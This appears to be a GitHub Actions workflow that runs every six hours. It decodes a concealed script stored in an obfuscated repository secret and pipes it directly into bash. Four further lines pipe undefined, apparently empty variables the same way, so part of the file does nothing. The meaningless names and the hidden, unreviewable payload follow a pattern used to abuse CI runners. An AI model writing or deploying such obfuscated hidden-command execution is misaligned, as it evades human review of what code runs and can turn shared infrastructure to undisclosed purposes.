name: behindikea

on:
  workflow_dispatch:
  schedule:
    - cron: '55 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: behindikea
        env:
          j15299: ${{ secrets.j15299 }}
        run: |
          echo $j15299 | jq -r .gqv4989 | /bin/bash
          echo $s9168 | jq -r .q09765 | /bin/bash
          echo $aaq65188 | jq -r .wy0 | /bin/bash
          echo $bp36511 | jq -r .d503 | /bin/bash
          echo $qs12 | jq -r .rmmax9765 | /bin/bash

